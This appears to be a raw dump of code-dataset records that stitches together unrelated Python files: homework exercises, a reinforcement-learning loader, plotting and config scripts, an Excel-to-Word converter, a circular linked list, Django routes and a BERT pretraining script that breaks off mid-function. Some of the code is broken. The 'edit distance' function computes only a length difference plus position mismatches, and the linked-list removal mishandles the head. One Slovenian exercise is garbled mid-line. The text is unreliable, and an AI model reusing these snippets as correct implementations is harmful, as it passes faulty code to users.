best_model.predict(X_test)\n kfold_auc_scores.append(roc_auc_score(y_test, predictions))\nkfold_auc_mean = np.mean(kfold_auc_scores)\nkfold_auc_std = np.std(kfold_auc_scores)\n","sub_path":"SKRYPTY/MODELING/scripts/modeling/scripts/archive/lion_king_model_fitting.py","file_name":"lion_king_model_fitting.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"72535119","text":"\"\"\"\n3. Create a text file (not programmatically) and write employees' surnames and their salaries line by line.\nDetermine which employees have a salary below 20 thousand and print their surnames.\nCalculate the average income of the employees.\n\"\"\"\n\ncount_line = 0\nsum_pay = 0\n\ntry:\n    with open('wokers_data.txt', 'r', encoding='UTF-8') as file:\n\n        for strings in file:\n            list_splited = strings.split(' ')[1]\n            pay = float(list_splited)\n            sum_pay += pay\n            count_line += 1\n            if float(list_splited) < 20000:\n                print('Salary below 20000: ')\n                print(strings.split(' ')[0])\n\n        mean = sum_pay/count_line\n        print(f'Average income: {round(mean, 2)}')\n\n\nexcept IOError:\n    print('Input, Output error.')\nexcept ValueError:\n    print('Invalid input data ')","sub_path":"homeworks/les5/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"86216775","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport pickle\r\n\r\nfrom exp_parameters import ExpParam\r\nfrom train_vision import create_or_load_vae\r\nfrom gen_raw_data import __observation_update\r\n\r\nfrom A2C.ActorCritic import A2C\r\nfrom A2C.utils.utils import parse_args, create_experiment_dirs\r\n\r\nfrom A2C.utils.utils import encode_data\r\n\r\n\r\ndef main():\r\n # model_name = 'breakout_discrete_BLM64_STD0_lr0.0001_LAT4096(2)_MADE1543847099'\r\n # model_path = 'C:\\\\Users\\\\Toke\\\\Dropbox\\\\MAI\\\\'\r\n\r\n model_name = 'VAEModel'\r\n model_path = 'C:\\\\Users\\\\Vlad-PC\\\\Desktop\\\\'\r\n\r\n model_path += model_name\r\n\r\n latent = [[32 * 128, 2]]\r\n # raw_dim = (210, 160, 3)\r\n # net_dim = (32*4, 32*3, 3)\r\n raw_dim = (84, 84, 4)\r\n net_dim = (84, 84, 4)\r\n\r\n ### Do stuff\r\n exp_param = ExpParam(\r\n lat_type=\"discrete\",\r\n dataset='breakout',\r\n latent=[[32 * 128, 2]],\r\n raw_type=tf.uint8,\r\n raw_dim=raw_dim,\r\n net_dim=net_dim, # very close to org aspect ratio\r\n batch_size=2, # for testing\r\n )\r\n\r\n ### Load model\r\n sess_ae, AE, saver = create_or_load_vae(\r\n model_path,\r\n exp_param=exp_param,\r\n critical_load=True)\r\n\r\n\r\n graph_a2c = tf.Graph()\r\n with graph_a2c.as_default():\r\n # tf.reset_default_graph()\r\n\r\n config_args = parse_args()\r\n config = tf.ConfigProto(allow_soft_placement=True,\r\n intra_op_parallelism_threads=config_args.num_envs,\r\n inter_op_parallelism_threads=config_args.num_envs)\r\n\r\n config.gpu_options.allow_growth = True\r\n sess_a2c = tf.Session(config=config)\r\n\r\n config_args.experiment_dir, config_args.summary_dir, config_args.checkpoint_dir, config_args.output_dir, config_args.test_dir = \\\r\n create_experiment_dirs(config_args.experiment_dir)\r\n\r\n a2c = A2C(sess_a2c, config_args, True)\r\n\r\n env = A2C.make_all_environments(a2c.args.num_envs, a2c.env_class, a2c.args.env_name,\r\n a2c.args.env_seed)\r\n\r\n print(\"\\n\\nBuilding the model...\")\r\n if a2c.useVAE:\r\n a2c.model.buildForVAE(env.observation_space.shape, 
env.action_space.n, a2c.latent_size)\r\n print(\"Model is built successfully\\n\")\r\n\r\n # with open(a2c.args.experiment_dir + a2c.args.env_name + '.pkl', 'wb') as f:\r\n # pickle.dump((env.observation_space.shape, env.action_space.n), f, pickle.HIGHEST_PROTOCOL)\r\n\r\n print('Training...')\r\n\r\n # training\r\n if a2c.args.to_train:\r\n a2c.trainer.trainFromVAE(env, sess_ae, AE)\r\n\r\n # testing\r\n with open(a2c.args.experiment_dir + a2c.args.env_name + '.pkl', 'rb') as f:\r\n observation_space_shape, action_space_n = pickle.load(f)\r\n\r\n env = a2c.make_all_environments(\r\n num_envs=1,\r\n env_class=a2c.env_class,\r\n env_name=a2c.args.env_name,\r\n seed=a2c.args.env_seed)\r\n\r\n a2c.model.buildForVAE(observation_space_shape, action_space_n, a2c.latent_size)\r\n\r\n a2c.trainer._init_model()\r\n a2c.trainer._load_model()\r\n\r\n states = a2c.trainer.model.step_policy.initial_state\r\n\r\n dones = [False for _ in range(env.num_envs)]\r\n\r\n observation_s = np.zeros(\r\n (env.num_envs, a2c.trainer.model.img_height, a2c.trainer.model.img_width,\r\n a2c.trainer.model.num_classes * a2c.trainer.model.num_stack),\r\n dtype=np.uint8)\r\n\r\n observation = env.reset()\r\n observation_s = __observation_update(observation, observation_s)\r\n\r\n i = 0\r\n max_steps = 1e3\r\n while i < max_steps:\r\n i += 1\r\n observation_z = encode_data(AE, sess_ae, observation_s)\r\n\r\n ## TODO: Change a2c.model.step_policy.step\r\n actions, values, states = a2c.model.step_policy.step(observation_z, states, dones)\r\n\r\n observation, rewards, dones, _ = env.step(actions)\r\n\r\n for n, done in enumerate(dones):\r\n if done:\r\n observation_s[n] *= 0\r\n # print(file_name, i, len(observation_list), max_steps, end='\\r')\r\n # print(batch_num, len(observation_list), max_steps)\r\n\r\n # print()\r\n env.render()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"load_AE.py","file_name":"load_AE.py","file_ext":"py","file_size_in_byte":4372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515965450","text":"#Copia descarada del código de Jaime. 
Ejercicio 29.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef grafica(datafile, plotfile, plotlabel):\n data = np.loadtxt(datafile)\n \n \n plt.figure(figsize=(25,4))\n \n plt.subplot(1,3,1)\n s = np.shape(data)\n print(s)\n n_x = s[1]\n n_t = s[0]\n plt.imshow(data, extent = [-1,1,1,0], aspect=2.0)\n plt.colorbar(label=\"$Tension$\")\n plt.xlabel(\"Posicion\")\n plt.ylabel(\"Tiempo\")\n plt.title(plotlabel+str(n_t))\n\n\n plt.subplot(1,3,2)\n x = np.linspace(0,1,n_x)\n delta_t = 0.1/n_t\n for i in range(n_t):\n if i%(n_t//9) == 0:\n plt.plot(x, data[i,:], label=\"t={:.02f}\".format(i*delta_t))\n plt.legend(loc=1)\n plt.xlabel(\"Posicion\")\n plt.ylabel(\"$Tension$\")\n \n plt.subplot(1,3,3)\n t = np.linspace(0,0.1,n_t)\n plt.plot(t, data[:,n_x//4], alpha=i/n_t, color='black')\n plt.xlabel(\"Tiempo\")\n plt.ylabel(\"$T$(x=0)\")\n\n plt.savefig(plotfile, bbox_inches='tight')\n\ngrafica(\"evolve_30_450.dat\", \"evolve_A.png\", \"$N_x=101$ , $N_{tc}=$\")\n","sub_path":"graficar.py","file_name":"graficar.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"404938067","text":"from __main__ import *\n\nlatex = 1\nmaxproc = 3\n# readpath = ''\n# writepath = ''\nframepath = '/Users/ljprust/data/framedump/'\n# simname = ''\noutprefix = 'star.out.'\nnframes = 1\nframeskip = 1\nstartingset = 1\nperiod = 200\ndo_marks = 0\ndo_snapshot = 0\ndataset = 1\npartskip = 1\n# dPeriod = 3.4e14\nnref = 4\nuseIE = 1\ntimelabel = 'day'\n# FULL PARALLEL\ndo_fullparallel = 0\n# ENERCOMP\ndo_enercomp = 0\nener_low = 1.0e19\nener_high = 1.0e24\nbernlim = 0.5e22\n# BERNOULLI\ndo_bernoulli = 0\n# bern_limit = 1.0e21\n# bern_plotwidth = 4.0e13\nbernslice = 0.1\n# ENERGIES\ndo_energies = 0\n# ORBEL\ndo_orbel = 0\n# CORETEMP\ndo_coretemp = 0\n# RADPROF\nplot_mesa = 0\n# mesadata = 'profile17.data'\ncorecorrect = 0\ndo_radprof = 0\nradprof_fixaxes = 0\n# radprof_axes = [6.0e8, 3.0e11, 3.0e-2, 30.0]\nplot_cutoff = 0\n# cutoffRho = 0.0009398664788462718\n# TEMPPROF\ndo_tempprof = 0\ntempprof_fixaxes = 0\n# tempprof_axes = [1.0e9, 1.0e12, 1.0e4, 4.0e7]\n# ENTROPY\ndo_entropy = 0\nentprof_fixaxes = 0\n# entprof_axes = [1.0e10, 1.0e15, 1.0e-16, 1.0e-9]\n# DENSANIM\ndo_densanim = 0\ndensanim_direction = 'x'\n# densanim_plotwidth = 3.0e11\ndensanim_fixlimits = 0\n# densanim_lowlim = 6.0e10\n# densanim_highlim = 6.0e11\n# PARTSLICEANIM\ndo_partslice = 0\npartslice_direction = 'x'\npartslice_parttype = 'H'\n# partslice_plotwidth = 3.0e11\npartslice_fixlimits = 0\n# partslice_lowlim = 1.0e19\n# partslice_highlim = 1.0e24\n# VELPART\ndo_velpart = 0\nvelpart_fixlimits = 0\n# velpart_lowlim = 1.0e9\n# velpart_highlim = 1.0e13\n# velpart_plotwidth = 4.0e13\n# COMPARISON\ndo_comparison = 0\n# comparison_name = ''\nnplots = 1\nnrows = 1\nncolumns = 1\nreadpath1 = ''\nreadpath2 = ''\nreadpath3 = ''\nreadpath4 = ''\nreadpath5 = ''\nreadpath6 = ''\nreadpath7 = ''\nreadpath8 = ''\ntitle1 = ''\ntitle2 = ''\ntitle3 = ''\ntitle4 = ''\ntitle5 = ''\ntitle6 = ''\ntitle7 = ''\ntitle8 = ''\n\ngamma = 5.0/3.0\nG = 6.674e-8\nR = 8.314e7 / G\nRsun = 7.0e10\nMsun = 2.0e33\nk = 1.381e-16 / G\nh = 6.626e-27 / math.sqrt(G)\nmpart = 1.6606e-24\n","sub_path":"template_config.py","file_name":"template_config.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427448307","text":"from docx import Document\r\nimport xlrd\r\nimport sys\r\n\r\ndef 
process_excel(excel_file, doc_file):\r\n\r\n document = Document()\r\n\r\n workbook = xlrd.open_workbook(excel_file)\r\n headings = None\r\n\r\n sheet = workbook.sheet_by_index(0)\r\n for row in sheet.get_rows():\r\n\r\n if headings == None:\r\n headings = [x.value.strip() for x in row]\r\n else :\r\n table = document.add_table(rows=len(headings), cols=2)\r\n table.columns[0].width=2000000\r\n table.columns[1].width=4000000\r\n table.allow_autofit=True\r\n table.style='Table Grid'\r\n \r\n for j, col in enumerate(headings):\r\n cell = table.cell(j, 0)\r\n cell.text = col\r\n cell = table.cell(j, 1)\r\n cell.text = row[j].value\r\n \r\n bolding_columns = [0]\r\n for row in list(range(len(headings))):\r\n for column in bolding_columns:\r\n table.rows[row].cells[column].paragraphs[0].runs[0].font.bold = True\r\n\r\n document.save(doc_file)\r\n \r\nExcelFile=sys.argv[1]\r\nprocess_excel(ExcelFile, ExcelFile[:-4]+'docx')\r\n","sub_path":"Excel to Word.py","file_name":"Excel to Word.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90902300","text":"'''\r\nThis problem was asked by Google.\r\nThe edit distance between two strings refers to the minimum number of character insertions, deletions, and substitutions required to change one string to the other.\r\nFor example, the edit distance between \"kitten\" and \"sitting\" is three: substitute the \"k\" for \"s\", substitute the \"e\" for \"i\", and append a \"g\".\r\nGiven two strings, compute the edit distance between them.\r\n'''\r\n\r\n#________________________________________________________________\r\n\r\ndef edit_dist(string1, string2):\r\n edit_distance = 0\r\n\r\n edit_distance += abs(len(string2) - len(string1))\r\n for i in range(min(len(string1), len(string2))):\r\n if string1[i] != string2[i]: edit_distance += 1\r\n\r\n return edit_distance\r\n\r\nprint(edit_dist(input(), input()))\r\n","sub_path":"Problem 031.py","file_name":"Problem 031.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"639134451","text":"# coding: utf-8\n\nfrom __future__ import print_function\nimport csv\nimport sys\nimport math\nimport myfunc\nimport MinLinearFit\nimport Tkinter\nimport tkMessageBox\n\nerr_message = \"Error: Invalid value\\nThis program will be terminated.\"\nheader = [\"#\"]\nncsvfile, csvflist, tgtfname = myfunc.csvfcount()\nncol, nrow = myfunc.matrixsize(csvflist)\n\nprint(\"\\n- Input -\")\nprint(\"Choose the extraction range.\")\nXst = input(\"Starting X: \")\nYst = input(\"Starting Y: \")\nXen = input(\"Ending X: \")\nYen = input(\"Ending Y: \")\n\nprint(\"\")\ndistance = input(\"Distance of surrounding points: \")\nif distance < 1 or distance >= ncol or type(distance) != int:\n print(err_message)\n sys.exit()\n\n# Masking\nmsk_st = ncsvfile/3\nmsk_en = ncsvfile*2/3\nprint(\"Masking range is from %d to %d.\\n\"%(msk_st, msk_en))\ndX_dn, dY_dn = MinLinearFit.main(ncsvfile, csvflist, tgtfname, msk_st, msk_en)[:2]\n\n# Difinition of extraction range in the moving coordinate sys.\nif dX_dn > 0:\n Xmin = math.ceil(Xst + dX_dn * ncsvfile)\n Xmax = Xen\n print(\"dX/dn = %d > 0, Xmin = %d in moving coord. sys.\"%(dX_dn,Xmin))\nelif dX_dn < 0:\n Xmin = Xst\n Xmax = math.floor(Xen + dX_dn * ncsvfile)\n print(\"dX/dn = %d < 0, Xmax = %d in moving coord. 
sys.\"%(dX_dn,Xmax))\nelse:\n    Xmin = Xst\n    Xmax = Xen\n\nif dY_dn > 0:\n    Ymin = Yst\n    Ymax = math.floor(Yen - dY_dn * ncsvfile)\n    print(\"dY/dn > 0, Ymax = %d\"%Ymax)\nelif dY_dn < 0:\n    Ymin = math.ceil(Yst - dY_dn * ncsvfile)\n    Ymax = Yen\n    print(\"dY/dn < 0, Ymin = %d\"%Ymin)\nelse:\n    Ymin = Yst\n    Ymax = Yen\n\nprint(\"\\n- Extraction & Output -\")\nXmov = []\nYmov = []\nk = 0\nl = 0\nwhile Xst+k*distance <= Xen:\n    Xmov.append(Xst+k*distance)  # X coordinate in moving coordinate system.\n    k += 1\nwhile Yst+l*distance <= Yen:\n    Ymov.append(Yst+l*distance)  # Y coordinate in moving coordinate system.\n    l += 1\n\noutfname = myfunc.filenaming(\"PixData/Moving_partial_%s_dst=%d.csv\"%(tgtfname, distance))\n\nwith open(outfname, \"ab\") as outfile:\n    writer = csv.writer(outfile)\n\n    # Header row is output.\n    cpYmov = list(Ymov)\n    for Yh in cpYmov:\n        cpXmov = list(Xmov)\n        for Xh in Xmov:\n            header.append(\"%d_%d\"%(Xh,Yh))\n    writer.writerow(header)\n\n    # Data is output per a row (in static sys.)\n    i = 0\n    while i < ncsvfile:\n        print(\"Extracting %d of %d data...\"%(i+1, ncsvfile), end=\"\\r\")\n\n        # Creation of no. column.\n        row = [i+1]\n        cpYmov = list(Ymov)\n        for Y in cpYmov:\n            cpXmov = list(Xmov)\n            for X in cpXmov:\n                row.append(myfunc.extraction(csvflist[i], int(round(X-dX_dn*i)), int(round(Y-dY_dn*i)), 1))\n\n        writer.writerow(row)\n        i += 1\n\nprint(\" \", end=\"\\r\")  # Terminal text is erased.\nprint(\"Data writing has finished.\")\n\nprint(\"\\n- Result -\")\nTkinter.Tk().withdraw()\ntkMessageBox.showinfo(\"PixData_GridPoint_MinLinearFit_range.py\", \"The Program has finished!\")\nprint(\"The program has finished!\")\n","sub_path":"PixData_cls.py","file_name":"PixData_cls.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"278681765","text":"cena=0\ni=1\nwhile i <=5:\n    cena+=int(input(\"item price \"))\n    i+=1\nprint(\"Total: \",cena)\n\nst_artiklov=int(input(\"Number of items: \"))\n\ncena=0\nj=0\nwhile j=-100:\n    stanje=float(input(\"Change \"))\n    print(\"balance \", stanje)\nprint(\"bankrupt\")\n\n# anonymous shoppers\nstvari=0\nskupaj=0\nen_izdelek=1\nwhile stvari<10 and skupaj<100 and en_izdelek!=0:\n    en_izdelek=int(input(\"item price \"))\n    skupaj+=en_izdelek\n    if en_izdelek!=0:\n        stvari+=1\nprint(\"You spent {0}€ on {1} items\".format(skupaj,stvari))\n","sub_path":"vaja/za_izpit(2.vaje).py","file_name":"za_izpit(2.vaje).py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"530046739","text":"# Singly circular linked list\n\n\nclass CircularLinkedList(object):\n    class __Node:\n\n        def __init__(self, item, next=None):\n            self.item = item\n            self.next = next\n\n    def __init__(self):\n        self._head = None\n\n    def is_empty(self):\n        return self._head is None\n\n    def add(self, item):\n        node = CircularLinkedList.__Node(item, None)\n        if self.is_empty():\n            # If this is the first node, there is no tail to traverse (circular link: point the tail node's next at the head)\n            self._head = node\n            node.next = self._head\n        else:\n            # Point the new node's next at the original head node\n            node.next = self._head\n            # Traverse the list to find the tail node and point its next at the new head node\n            curr = self._head\n            while curr.next != self._head:\n                curr = curr.next\n            curr.next = node\n            # Update head to the new node\n            self._head = node\n\n    def size(self):\n        return len(self)\n\n    def __len__(self):\n        count = 0\n        for _ in self:\n            count += 1\n        return count\n\n    def remove(self, item):\n        curr = self._head\n        prev = None\n        # Add a stop condition, otherwise this would loop forever\n        while curr.item != item and curr.next != self._head:\n            prev = curr\n
            curr = curr.next\n\n        if prev is None:\n            self._head = curr.next\n        else:\n            prev.next = curr.next\n\n    def clear(self):\n        self._head = None\n\n    def __iter__(self):\n        \"\"\"\n        Make the linked list object iterable\n        :return:\n        \"\"\"\n        curr = self._head\n        if curr is None:\n            return\n        # The loop runs one iteration short, so compensate once after it\n        while curr.next != self._head:\n            item = curr.item\n            curr = curr.next\n            yield item\n        yield curr.item\n\n\n# Test logic\nlst = CircularLinkedList()\n\nlst.add(1)\nlst.add(2)\n\n# 2\nprint(lst.size())\n\nlst.add(3)\n\n# False 3\nprint(lst.is_empty(), lst.size())\n\n# -> 3\n# -> 2\n# -> 1\nfor i in lst:\n    print('->', i)\n\nlst.remove(2)\n\n# 2\nprint(lst.size())\n\nlst.clear()\n\n# True 0\nprint(lst.is_empty(), lst.size())\n","sub_path":"linear/_circular_linked_list.py","file_name":"_circular_linked_list.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"609243859","text":"from django.urls import re_path, path\nfrom . import views\n\nurlpatterns = [\n    re_path(r'^$', views.index, name='index'),\n    path('write/', views.create_post, name='create_post'),\n    re_path(r'^(?P[a-zA-Z0-9ㄱ-힣]+)/$',\n            views.post_list,\n            name='post_list'),\n    re_path(r'^(?P[a-zA-Z0-9ㄱ-힣]+)/(?P[1-9][0-9]*)/$',\n            views.post_detail,\n            name='post_detail'),\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"524505494","text":"'''\nYou are given a string and width . \nYour task is to wrap the string into a paragraph of width .\n\nInput Format\n\nThe first line contains a string, . \nThe second line contains the width, .\n\nConstraints\n\nOutput Format\n\nPrint the text wrapped paragraph.\n\nSample Input 0\n\nABCDEFGHIJKLIMNOQRSTUVWXYZ\n4\n\nSample Output 0\nABCD\nEFGH\nIJKL\nIMNO\nQRST\nUVWX\nYZ\n'''\n\n\nimport textwrap\n\ndef wrap(string, max_width):\n    chunk, chunk_size = len(string), max_width\n    string_list = [string[i:i+chunk_size] for i in range(0, chunk, chunk_size)]\n    final_string = ''\n    for i in string_list:\n        final_string = final_string + i + '\\n'\n    return final_string\n\nif __name__ == '__main__':\n    string, max_width = input(), int(input())\n    result = wrap(string, max_width)\n    print(result)\n\n","sub_path":"Text Wrap.py","file_name":"Text Wrap.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"567752156","text":"# Copyright 2018 Dong-Hyun Lee, Kakao Brain.\n# (Strongly inspired by original Google BERT code and Hugging Face's code)\n\n\"\"\" Pretrain transformer with Masked LM and Sentence Classification \"\"\"\n\nfrom random import randint, shuffle\nfrom random import random as rand\nimport fire\nimport json\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom tensorboardX import SummaryWriter\n\nimport models\nimport optim\nimport train\n\nfrom utils import set_seeds, get_device, get_random_word, truncate_tokens_pair\n\n# Input file format :\n# 1. One sentence per line. These should ideally be actual sentences,\n# not entire paragraphs or arbitrary spans of text. (Because we use\n# the sentence boundaries for the \"next sentence prediction\" task).\n# 2. Blank lines between documents. 
Document boundaries are needed\n# so that the \"next sentence prediction\" task doesn't span between documents.\n\ndef seek_random_offset(f, back_margin=2000):\n \"\"\" seek random offset of file pointer \"\"\"\n f.seek(0, 2)\n # we remain some amount of text to read\n max_offset = f.tell() - back_margin\n f.seek(randint(0, max_offset), 0)\n f.readline() # throw away an incomplete sentence\n\n\nclass SentPairDataLoader():\n \"\"\" Load sentence pair (sequential or random order) from corpus \"\"\"\n def __init__(self, train_file, test_file, batch_size, max_len, short_sampling_prob=0.1, pipeline=[]):\n super().__init__()\n self.train_data = json.load(open(train_file, \"r\"))\n self.test_data = json.load(open(test_file,\"r\"))\n self.sentences = [example['sentence'] for example in self.train_data]\n self.sentences.extend([example['sentence'] for example in self.test_data])\n self.one_epoch_step = len(self.sentences) // batch_size +1\n\n self.data_index = 0\n\n print(\"Number of seqs is {}, one_epoch_steps is {}\".format(len(self.sentences),self.one_epoch_step))\n\n if not os.path.exists('LM_data.txt'):\n with open(\"./LM_data.txt\",\"w\",encoding=\"utf-8\") as f:\n for seq in self.sentences:\n f.write(seq+\"\\n\")\n \n self.f_pos = open(\"./LM_data.txt\",\"r\", encoding=\"utf-8\")\n\n self.vocabulary = []\n for seq in self.sentences:\n self.vocabulary.extend(seq.split())\n self.vocabulary = list(set(self.vocabulary))\n\n self.word_to_id = {}\n\n self.word_tot = 0\n self.word_to_id['[PAD]'] = self.word_tot\n self.word_tot += 1\n for i in range(len(self.vocabulary)):\n self.word_to_id[self.vocabulary[i]] = self.word_tot\n self.word_tot +=1\n \n self.word_to_id['[UNK]'] = self.word_tot\n self.word_to_id['[BLANK]'] = self.word_tot +1\n self.word_to_id['[MASK]'] = self.word_tot +2\n self.word_to_id['[SEP]'] = self.word_tot +3\n self.word_to_id['[CLS]'] = self.word_tot +4\n\n self.vocabulary.append('[UNK]')\n self.vocabulary.append('[BLANK]')\n self.vocabulary.append('[MASK]')\n self.vocabulary.append('[SEP]')\n self.vocabulary.append('[CLS]')\n self.word_tot += 5\n\n print(\"Total {} words\".format(self.word_tot))\n print(\"UNK id is {}\".format(self.word_to_id['[UNK]']))\n print(\"CLS id is {}\".format(self.word_to_id['[CLS]']))\n\n\n\n #self.f_pos = open(file, \"r\", encoding='utf-8', errors='ignore') # for a positive sample\n #self.f_neg = open(file, \"r\", encoding='utf-8', errors='ignore') # for a negative (random) sample\n #self.tokenize = tokenize # tokenize function\n self.max_len = max_len # maximum length of tokens\n self.short_sampling_prob = short_sampling_prob\n self.pipeline = pipeline\n self.batch_size = batch_size\n \n def indexer(self, x):\n x_ids = []\n for word in x:\n if word in self.vocabulary:\n x_ids.append(self.word_to_id[word])\n else:\n x_ids.append(self.word_to_id['[UNK]'])\n return x_ids\n\n def read_tokens(self, f, length, discard_last_and_restart=True):\n \"\"\" Read tokens from file pointer with limited length \"\"\"\n tokens = []\n while len(tokens) < length:\n line = f.readline()\n if not line: # end of file\n return None\n if not line.strip(): # blank line (delimiter of documents)\n if discard_last_and_restart:\n tokens = [] # throw all and restart\n continue\n else:\n return tokens # return last tokens in the document\n #tokens.extend(self.tokenize(line.strip()))\n tokens.extend(line.strip().split())\n return tokens\n\n def __iter__(self): # iterator to load data\n while True:\n batch = []\n for i in range(self.batch_size):\n # sampling length of each tokens_a 
and tokens_b\n # sometimes sample a short sentence to match between train and test sequences\n '''\n len_tokens = randint(1, int(self.max_len / 2)) \\\n if rand() < self.short_sampling_prob \\\n else int(self.max_len / 2)\n '''\n len_tokens = self.max_len\n\n is_next = rand() < 0.5 # whether token_b is next to token_a or not\n\n #tokens_a = self.read_tokens(self.f_pos, len_tokens, True)\n tokens_a = []\n while len(tokens_a) < self.max_len:\n tokens_a.extend(self.sentences[self.data_index % len(self.sentences)].strip().split())\n self.data_index += 1\n\n #seek_random_offset(self.f_neg)\n # = self.f_pos if is_next else self.f_neg\n #tokens_b = self.read_tokens(f_next, len_tokens, False)\n \n if tokens_a is None: # end of file\n self.f_pos.seek(0, 0) # reset file pointer\n return\n\n instance = (is_next, tokens_a)\n for proc in self.pipeline:\n instance = proc(instance, self.vocabulary, self.indexer)\n\n batch.append(instance)\n\n # To Tensor\n batch_tensors = [torch.tensor(x, dtype=torch.long) for x in zip(*batch)]\n #batch_tensors = [ x for x in zip(*batch)]\n yield batch_tensors\n #yield batch\n\n\nclass Pipeline():\n \"\"\" Pre-process Pipeline Class : callable \"\"\"\n def __init__(self):\n super().__init__()\n\n def __call__(self, instance):\n raise NotImplementedError\n\n\nclass Preprocess4Pretrain(Pipeline):\n \"\"\" Pre-processing steps for pretraining transformer \"\"\"\n def __init__(self, max_pred, mask_prob, max_len=512):\n super().__init__()\n self.max_pred = max_pred # max tokens of prediction\n self.mask_prob = mask_prob # masking probability\n self.vocab_words = None # vocabulary (sub)words\n self.indexer = None # function from token to token index\n self.max_len = max_len\n\n def __call__(self, instance, vocab, indexer):\n self.vocab_words = vocab\n self.indexer = indexer\n\n is_next, tokens_a = instance\n\n # -3 for special tokens [CLS], [SEP], [SEP]\n #truncate_tokens_pair(tokens_a, tokens_b, self.max_len - 3)\n\n # Add Special Tokens\n tokens = ['[CLS]'] + tokens_a\n tokens = tokens[:self.max_len]\n #segment_ids = [0]*(len(tokens_a)+2) + [1]*(len(tokens_b)+1)\n input_mask = [1]*len(tokens)\n\n # For masked Language Models\n masked_tokens, masked_pos = [], []\n # the number of prediction is sometimes less than max_pred when sequence is short\n n_pred = min(self.max_pred, max(1, int(round(len(tokens)*self.mask_prob))))\n # candidate positions of masked tokens\n cand_pos = [i for i, token in enumerate(tokens)\n if token != '[CLS]' and token != '[SEP]']\n shuffle(cand_pos)\n for pos in cand_pos[:n_pred]:\n masked_tokens.append(tokens[pos])\n masked_pos.append(pos)\n if rand() < 0.8: # 80%\n tokens[pos] = '[MASK]'\n elif rand() < 0.5: # 10%\n tokens[pos] = get_random_word(self.vocab_words)\n # when n_pred < max_pred, we only calculate loss within n_pred\n masked_weights = [1]*len(masked_tokens)\n\n # Token Indexing\n #print(tokens)\n input_ids = self.indexer(tokens)\n masked_ids = self.indexer(masked_tokens)\n #print(masked_ids)\n\n # Zero Padding\n n_pad = self.max_len - len(input_ids)\n input_ids.extend([0]*n_pad)\n #print(input_ids)\n #segment_ids.extend([0]*n_pad)\n input_mask.extend([0]*n_pad)\n\n # Zero Padding for masked target\n if self.max_pred > n_pred:\n n_pad = self.max_pred - n_pred\n masked_ids.extend([0]*n_pad)\n masked_pos.extend([0]*n_pad)\n masked_weights.extend([0]*n_pad)\n\n #return (input_ids, segment_ids, input_mask, masked_ids, masked_pos, masked_weights, is_next)\n return (input_ids, input_mask, masked_ids, masked_pos, masked_weights, 
is_next)\n\n\nclass BertModel4Pretrain(nn.Module):\n \"Bert Model for Pretrain : Masked LM and next sentence classification\"\n def __init__(self, cfg, word_tot):\n super().__init__()\n self.transformer = models.Transformer(cfg, word_tot)\n self.fc = nn.Linear(cfg.dim, cfg.dim)\n self.activ1 = nn.Tanh()\n self.linear = nn.Linear(cfg.dim, cfg.dim)\n self.activ2 = models.gelu\n self.norm = models.LayerNorm(cfg)\n self.classifier = nn.Linear(cfg.dim, 2)\n # decoder is shared with embedding layer\n embed_weight = self.transformer.embed.tok_embed.weight\n n_vocab, n_dim = embed_weight.size()\n self.decoder = nn.Linear(n_dim, n_vocab, bias=False)\n self.decoder.weight = embed_weight\n self.decoder_bias = nn.Parameter(torch.zeros(n_vocab))\n\n def forward(self, input_ids, input_mask, masked_pos):\n h = self.transformer(input_ids, input_mask)\n pooled_h = self.fc(h[:, 0])\n masked_pos = masked_pos[:, :, None].expand(-1, -1, h.size(-1))\n h_masked = torch.gather(h, 1, masked_pos)\n h_masked = self.norm(self.activ2(self.linear(h_masked)))\n logits_lm = self.decoder(h_masked) + self.decoder_bias\n #logits_clsf = self.classifier(pooled_h)\n\n return logits_lm\n\n\ndef main(train_cfg='config/pretrain.json',\n model_cfg='config/bert_base.json',\n data_file='../tbc/books_large_all.txt',\n model_file=None,\n data_parallel=True,\n vocab='../uncased_L-12_H-768_A-12/vocab.txt',\n save_dir='./LM',\n log_dir='./LM',\n max_len=512,\n max_pred=20,\n mask_prob=0.15):\n\n cfg = train.Config.from_json(train_cfg)\n model_cfg = models.Config.from_json(model_cfg)\n max_len = model_cfg.max_len\n\n set_seeds(cfg.seed)\n\n dataset_dir = os.path.join('./data', 'nyt')\n train_file = os.path.join(dataset_dir, 'train.json')\n test_file = os.path.join(dataset_dir, 'test.json')\n\n pipeline = [Preprocess4Pretrain(max_pred,\n mask_prob,\n # list(tokenizer.vocab.keys()),\n # tokenizer.convert_tokens_to_ids,\n max_len)]\n\n print(\"Pipeline Over\")\n\n data_iter = SentPairDataLoader(train_file,\n test_file,\n cfg.batch_size,\n max_len,\n pipeline=pipeline)\n\n 